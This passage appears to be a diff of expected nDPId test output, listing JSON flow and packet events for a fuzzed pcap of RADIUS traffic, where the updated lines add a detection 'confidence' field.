1MTY0ODBAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996067791,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1528996068005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528996068005,"pkt":"ABRP+4rqcNuYVcUnCABFAACl7dxAAPwRZijG4hk1CmZAHgcUchAAkTltCwoAiSM4ARafmcO5UlnZgWS\/VrEBNTAzMXE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAufWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6dmY6MTQvMjA1Tw4BAgAMFwwAAAwBQABQEpOK5mo0k\/FCxgtYc0d6dIg="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996068005,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1528996068129,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"ts_msec":1528996068129,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIMdAAP8RAAAKDEAexuIZNXIQBxQClwAAAQsCj4S+BLJeRUI2j+crsJkatvQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUiUAGgkAADghDQM2NwZbIqDkATUwMzExNDgwMjcxNTE2NDgwQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZmMtZGItYjMtMDgtZmYtMTQeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjFkMWEwMjI1YiwgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6ZmY6MTQvMjA1BAasFAEQIA5WWldDMlRlc3RsYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAgAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARMVBoQAAAlAAoKU3RhbmQ5cmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAGCESD0ludmFsQmQgVmFsdWUaHQAAOCETFzQwLjgwNDg4JQAtNzQuMTAyODNVVxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS3TFDXZx6RcHx5Q8nnMq0Ng=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1528996068284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"ts_msec":1528996068284,"pkt":"ABRP+4rqcNuYVcUnCABFAADz7eFAAPwRZdbG4hk1CgxAHgcUchAA39JxAwsA1+U\/DuIEVKatp1a5Vz8iUQkBNTAzMTE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAubaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528996068129,"flow_last_seen":1528996068284,"flow_idle_time":180000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":870,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1528996520702,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996520702,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996520702,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528996068129,"flow_last_seen":1528996068284,"flow_idle_time":180000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":870,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1528996520702,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996520702,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996520702,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01288{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528996520702,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996520912,"flow_last_seen":1528996520912,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528996520912,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1528996520912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528996520912,"pkt":"AFFP+4rqcNuYVcUnCABFAADh9PZAAPwRXtPG4hk1CgxAHgcUchAAzf\/ACwwAxUX8kZJ5SD1GIY9b3TLnaCUBNTAzMTEjODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2T0oBAgBIFwEAAAEFAACzfR5W9eh2OghNxDwVbojaAgEAABPTIXEVtgAALhLyMDDdAueLAQACCwUAJQD\/wh144KSIGN1E2YBCoTFQEji6recwpo2EGDX0tsWSQ1s="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996520912,"flow_last_seen":1528996520912,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528996520912,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996520912,"flow_last_seen":1528996520912,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528996520912,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528996521324,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01354{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1528996521324,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528996521324,"pkt":"AAAMB6xAABRP+4rqCABFAALHIMlAAP8RAAAKDEAexuIZNXIQBwQCswAAAQ0CqzlVBXH\/qH48qbcRRfwKWygaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqKpATUwxjExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3Bwbhp0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTBVLWE3LDQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBTUAAAAIGjEAAAAJASthdWRpWS1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjJmZWEwMjI1Yqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00814{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1528996521508,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"ts_msec":1528996521508,"pkt":"ABRP+4rqcNOYVcUnCABFAAEw9PpAAPwRXoDG4hk1CgxAHgcUchABHEdCAg0BFLBkFDYkf5Ol\/\/UprAe1krUaCwAAV8gbBVNQQxpuAAABNxA0lgZ9Ob56idWnj5mrGjH9HVyfl2CMD7kHBXWTlONuAdNpUT0PNMJ4+c6yAevgnrhFEzURNLRXMV1cukbtDiUAZlR3mWagN\/b3t5lQTdi7GNrmf6bckCtQUI9IvHwc\/ERWIYX5lcD4ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV08W9yay5vcmcsIDViMjJhMGZkL2YwOjc5OjYwOmQxOjdkOjM3LzIwNlkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBLahKO3\/veID+CdEt7EaDBi"}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01381{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1528996603395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528996603395,"pkt":"AAAMB6xAABRP+4rqCABFAALbIMpAAP8RAAAKDEAexuIZNXIQBxUCxwAABA4Cv7R7V6BSrXIqRSnri9UTMJ0aCnIAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzABNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWYRQAQP6AAAAAAAAAAAAAAAAAAAAgDlZaV0MyVGVzdExhYhoMAAA3YwEGAAAAAiwgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2PQYAAAATGjEAAAAJASthdWRpdC1zZXNzaW9uLWlk3TEwZmYxMGFjMDAwMDAwYjJmZWEwMjI1Yi0GAAAAAUAGAAAADUEGAAAABlEENTY3BlsiovsaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXSBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhcnVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QoBgAAAAIqBgFYQ8k0BgAAAAArBpKpaYo1BgAAAAAvBgAD8PkwBgAY5WwxBgAAAAYuBgAAAewpBgAAAAAfE2YwLTc5LTYwLWQxLTdkLTM3HiUwMC1hNy00Mi1kMC1lMC0wMDpWZXJpem9uV2lGaUFjY2RzcxoMAAAFgwcGwFBKmQ=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00489{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":147,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":147,"pkt_l4_len":0,"ts_msec":1528996603490,"pkt":"ABRP+4qfcNuYqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
